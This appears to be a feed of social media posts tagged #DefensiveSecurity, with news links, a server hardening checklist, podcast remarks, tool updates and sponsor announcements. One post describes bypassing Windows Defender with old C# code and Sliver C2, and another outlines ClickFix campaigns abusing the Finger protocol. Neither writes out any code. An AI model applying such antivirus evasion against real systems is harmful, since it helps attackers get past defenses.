The Mire is a defensive security system that shifts the economics of attack. Clients that ignore server directives are treated as hostile and met with cost and confusion—wasting time, compute, and analysis while serving convincingly real noise. #infosec #defensivesecurity

https://mire.cc/welcome-to-the-mire/

https://podverse.fm/episode/S224ePoTN Great episode #defensivesecurity podcast , no I’m not advertising Podverse it’s just what I use.

The decades-old Finger protocol is being abused in new ClickFix malware campaigns. Attackers are using Finger to pull remote commands onto Windows systems, leading to Python-based malware or NetSupport RAT infections. Newer variants even check for analysis tools before execution.

Anyone else seeing Finger traffic or legacy protocol misuse recently?
Follow for more updates.

#Malware #ClickFix #InfoSec #ThreatIntel #WindowsSecurity #CyberSecurity #RAT #LegacyProtocols #DefensiveSecurity

Attackers are targeting Azure Blob Storage in complex multi-stage campaigns — reminding us that cloud data needs active defense, not blind trust. ☁️🛡️ #CloudSecurity #DefensiveSecurity

https://www.microsoft.com/en-us/security/blog/2025/10/20/inside-the-attack-chain-threat-activity-targeting-azure-blob-storage/

Lobot: Cyborg responsible for systems and operations with unclear motives and allegiances.
Atom Eins: Cyborg responsible for systems and operations with unclear motives and allegiances.
Jerry Bell (@jerry): ...

#AlienEarth #StarWars #EmpireStrikesBack #DefensiveSecurity

📋 Server Security Checklist — Essential Hardening Guide 🛡️

Securing servers is critical to protect sensitive data, applications, and networks. Here’s a quick checklist every sysadmin and security engineer should follow to reduce risk and strengthen resilience. ⚡🔐

1️⃣ System & OS Hardening
🔹 Keep OS and packages updated (apply patches regularly).
🔹 Remove or disable unused services & software.
🔹 Configure secure boot and BIOS/UEFI passwords.

2️⃣ Access Control
🔹 Enforce strong passwords + MFA for all accounts.
🔹 Use role-based access (least privilege).
🔹 Disable root/administrator login over SSH/RDP.

3️⃣ Network Security
🔹 Restrict inbound/outbound traffic with firewalls.
🔹 Segment critical servers from general networks.
🔹 Disable unused ports & protocols.

4️⃣ Secure Remote Access
🔹 Use SSH with key-based auth (disable password logins).
🔹 Enforce VPNs for admin access.
🔹 Monitor and log remote sessions.

5️⃣ Logging & Monitoring
🔹 Enable centralized logging (syslog/SIEM).
🔹 Monitor failed login attempts & unusual activity.
🔹 Configure alerts for critical events.

6️⃣ Data Protection
🔹 Encrypt sensitive data at rest & in transit (TLS, disk encryption).
🔹 Regularly back up data to secure, offline storage.
🔹 Apply strict database access policies.

7️⃣ Application & Patch Management
🔹 Keep middleware, frameworks, and apps patched.
🔹 Remove default credentials and sample configs.
🔹 Use secure coding practices.

8️⃣ Malware & Intrusion Defense
🔹 Deploy antivirus/EDR for endpoints.
🔹 Enable IDS/IPS at the network edge.
🔹 Scan regularly for vulnerabilities.

9️⃣ Physical & Cloud Security
🔹 Restrict physical access to server rooms.
🔹 Harden cloud instances with provider tools (security groups, IAM).
🔹 Regularly review cloud audit logs.

🔟 Policy & Compliance
🔹 Apply CIS/NIST benchmarks.
🔹 Document access, configs, and changes.
🔹 Train admins in security best practices.

#ServerSecurity #CyberSecurity #InfoSec #BlueTeam #SysAdmin #ITSecurity #SecurityChecklist #DefensiveSecurity

A HUGE thank you to Mental Health Hacker's first PLATINUM sponsor, @blumirasec

This will enable us to bring even MORE to the @blueteamvillage
this year! Our partnership with BTV will enable us to help bring resources, content, and giveaways at @defcon this year! See ya'll soon!!

A Security Tool Your IT Team Can Actually Use

Blumira simplifies cybersecurity by combining ease of use with powerful protection. We enable teams big and small to defend effectively.

#defcon #defcon33 #blueteam #defensivesecurity #siem #mentalhealth

CVE Disruption Threatens Foundations of Defensive Security
https://www.darkreading.com/vulnerabilities-threats/cve-disruption-threatens-foundations-defensive-security

#Infosec #Security #Cybersecurity #CeptBiro #CVEDisruption #DefensiveSecurity

The Silent Superpower – Cybercrime in 2025
https://youtu.be/Kq5KaE1wAkU #cybersecurity #cybercrime #ransomware #malware #riskmanagement #defensivesecurity

🚨 Giveaway Alert: 3 LetsDefend VIP+ Vouchers for 1 Month Access! 🚨

We’re giving away 3 LetsDefend VIP+ vouchers for a free 1-month subscription on 02/01.

What You Need to Do:

1️⃣ Join our Discord Community (https://buff.ly/3Cfy9rT).

#CyberSecurity #BlueTeam #CyberTraining #InfoSec #DefensiveSecurity #ThreatHunting #SOCAnalyst #CyberDefense #SecurityAwareness #BlueTeamTraining

Joomla Web Services WITHOUT Super User. Least Privilege Principle. One of the fundamentals of Information Security.
https://apiadept.com/technical/joomla-web-services-without-super-user
#acl #cybersecurity #blueteam #defensivesecurity #leastprivilegeprinciple #defenseindepth #joomla #developer

@lerg @jerry
Listening to this week's #DefensiveSecurity podcast.
EDIT: After seeing the post, I'm guessing it was last week's podcast. 😅

Re: the discussion around the CI/CD hack, Francois Proulx and @becojo delivered a presentation on this very thing at @NorthSec earlier this year: https://nsec.io/session/2024-under-the-radar-how-we-found-0-days-in-the-build-pipeline-of-oss-packages.html

From my own discussions with the two of them it sounded like that kind of compromise will leak any secrets exposed to the build processes, and some of that depends on what security features are enabled on a given repository.

Interesting to see that being exploited in the wild.

Listening to @jerry on the most recent #DefensiveSecurity podcast. Specifically the point about how nobody really paid attention to border firewalls and then suddenly they did.

My pentest experience has mostly revealed an ugly truth: 99% of the time, any given piece of software which doesn't have a ton of CVEs reported for it isn't because it's secure, it's because nobody's looked.

Better education is key but I see a lot of colleges and universities taking the completely ass backwards approach. Instead of teaching every single developer how to securely code, they've spun up Cyber programs to chase those dollars. From an academic perspective it's a completely disappointing letdown.

It took until the Second Edition, but now the audiobook version of The Defensive Security Handbook has been released!!

Share with your friends, your co-workers, your leadership, family that you kind of like, etc

https://www.audible.com/pd/Defensive-Security-Handbook-2nd-Edition-Audiobook/B0DNRDYVK6?source_code=ASSORAP0511160006&share_location=pdp

#newrelease #secondedition #defensivesecurity #infosec #audiobook #cybersecurity

Riding the AI Waves: The Rise of Artificial Intelligence to Combat Cyber Threats
https://thehackernews.com/2024/01/riding-ai-waves-rise-of-artificial.html #cybersecurity #AI #defensivesecurity

SliverC2 Test + old code which still working...
this C# code was for 2019-2020 and i talked about that in my ebook "Bypassing AVs by C#.NET Programming v1.0" (Published in 2016 up to 2020 , free) but code still working on Windows Defender with (update 2023/08/28) , a little bit code changed by me which you can see in video , VirtualProtectEx added for changing RWX to X...

but in this new test, as you can see "Sliver-C2" (which i still think is much better than CobaltStrike) changed X Protection Mode to RW "in-Memory" by itself (not by my code), yeah Sliver-c2 done it and this will help you as penteser/redteamer to bypass almost all Avs and you as Blue teamer should learn how Attackers will bypass your defensive tools by these Simple/Advanced techniques... these things are very important for Defenders and in my new ebook "Bypassing AVs By C# Programming v2.0" , i will talk about these things to defenders/blue teamers also #redteamers and #pentesters or #SecurityResearchers etc.

btw this code is old and available in my github for ebook v1.0
also you can see Cobaltstrike test video here: https://lnkd.in/eCyxjN6m

#blueteam #pentester #redteam #offensivesecurity #defensivesecurity #ebook #av #protectionmode #inmemory #sliverc2

Cobalt Strike, a Defender’s Guide: https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/

#cobaltstrike #defensivesecurity

New update of code ETWPM2Monitor2.1 now is ready after days working on this (some bugs fixed) and i will publish this new ver soon [after some little bit new codes ;D] it almost is ready , as you can see Ekko detected via Extended Memory Scanners ... & all these logs will save in windows event log too and will add to System/Detection logs Tab ....

this tool created in 2021 and after 2 years now its better than before but still has some bugs ;D , it better than before because of some external code and Memory Scanners which made by others, so i should say thanks to all Blue team Developers and Red-team Developers to help me to make this project ETWPM2Monitor2.1 ...

Note: New Memory Scanner [Hunt-Sleeping-Beacons] Added to my #blueteam tools "#ETWPM2Monitor2" v2.1 and test was good but it still needs some new codes to be better than this and code almost is ready now my Tool have new #memoryscanner which is for #detecting #Sleepmasking and #Delay of codes for #Beacons etc.

this tool really needed something like this to cover gap for detection... this new scanner will scan processes every 60sec but in the future i will add some smarter code for this to detect processes better than this and ... so in this case this New Scanner was working independently and even without starting ETWProcessMon2.exe this scanner will work in ETWPM2Monitor2.1, as you know ETWPM2Monitor2.1 needs to work with #ETW #events via [running ETWProcessMon2.exe] etc.

#blueteam #pentesting #pentest #redteam #defender #defensivesecurity #defensive #defensive #defensivetools #monitoring #huntbeacons #beacons #cobaltstrike #soc #threatdetection #threathunting

#KubeCon #KubeConEU

attending

🛡 Kubernetes Defensive Monitoring with Prometheus - David de Torres Huerta & Mirco De Zorzi, Sysdig

#monitoring #devsecops #defensivesecurity

#Kali #Linux 2023.1 Release ( #KaliPurple & Python Changes) | Kali Linux Blog

Over the years, we have perfected what we have specialized in, offensive #security. We are now starting to branch into a new area, defensive security! We are doing an initial technical preview pre-launch of “Kali Purple”. This is still in its infancy and is going to need time to mature.
#DefensiveSecurity

https://www.kali.org/blog/kali-linux-2023-1-release/